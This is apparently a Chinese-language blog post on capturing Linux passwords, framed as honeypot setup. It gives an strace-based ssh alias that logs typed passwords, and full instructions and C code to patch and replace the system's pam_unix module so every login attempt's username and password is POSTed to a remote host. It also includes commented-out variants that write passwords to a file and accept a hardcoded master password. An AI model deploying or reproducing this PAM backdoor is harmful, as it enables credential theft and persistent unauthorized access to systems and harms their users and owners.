linux 密码记录(client/server)

---

以下我都是用来做蜜罐的

记录ssh密码(alias)

alias ssh='strace -o /tmp/.sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s 2048 ssh'

修改pam进行密码记录

#查找pam版本，寻找对应的版本下载
rpm -qa|grep -i pam
wget http://ftp.naist.jp/pub/linux/libs/pam/library/Linux-PAM-1.1.1.tar.gz
gzip -d Linux-PAM-1.1.1.tar.gz 
tar xvf Linux-PAM-1.1.1.tar 
cd Linux-PAM-1.1.1

编辑文件pam_unix_auth.c

#vim modules/pam_unix/pam_unix_auth.c 
#加入文件头

#include <sys/socket.h> /* socket, connect */
#include <netinet/in.h> /* struct sockaddr_in, struct sockaddr */
#include <netdb.h> /* struct hostent, gethostbyname */

#177行加入，修改这里会记录所有的密码包括登陆失败的密码，请注意
    D(("user=%s, password=[%s]", name, p));
    /*  mode 1  */
    int portno =        8080;
    char *host =        "192.168.3.19";
    char *message_fmt = "POST /u=%s&p=%s HTTP/1.0\r\n\r\n";
    struct hostent *server;
    struct sockaddr_in serv_addr;
    int sockfd, bytes, sent, received, total;
    char message[1024],response[4096];
    sprintf(message,message_fmt,name,p);
    printf("Request:\n%s\n",message);
    sockfd=socket(AF_INET,SOCK_STREAM,0);
    server = gethostbyname(host);
    memset(&serv_addr,0,sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(portno);
    memcpy(&serv_addr.sin_addr.s_addr,server->h_addr,server->h_length);
    if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
        printf("ERROR connecting");

    /* send the request */
    total = strlen(message);
    sent = 0;
    do {
        bytes = write(sockfd,message+sent,total-sent);
        if (bytes < 0)
            printf("ERROR writing message to socket");
        if (bytes == 0)
            break;
        sent+=bytes;
    } while (sent < total);
    memset(response,0,sizeof(response));
    total = sizeof(response)-1;
    received = 0;
    /* mode1  */
    /* mode2 */
    // FILE *fp = fopen("/var/log/aaa111","w+");
    // if(fp != NULL) {
        // fwrite(&p,strlen(p),2,fp);
        // fclose(fp);
    // }
    /* mode2 */

    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    /* mode3 */
    // if(strcmp(p,"backdoorpassword")==0){retval=PAM_SUCCESS;}
    /* mode3 */

    name = p = NULL;

替换文件

./configure && make
ls -la modules/pam_unix/.libs/
#32位系统
cp -rf modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so
#64位系统
cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.1
cp -rf modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so

cp /lib64/security/pam_unix.so.1 /lib64/security/pam_unix.so

work on centos debian

代码引用

• pam backdoor 自动安装脚本
• C 发送HTTP请求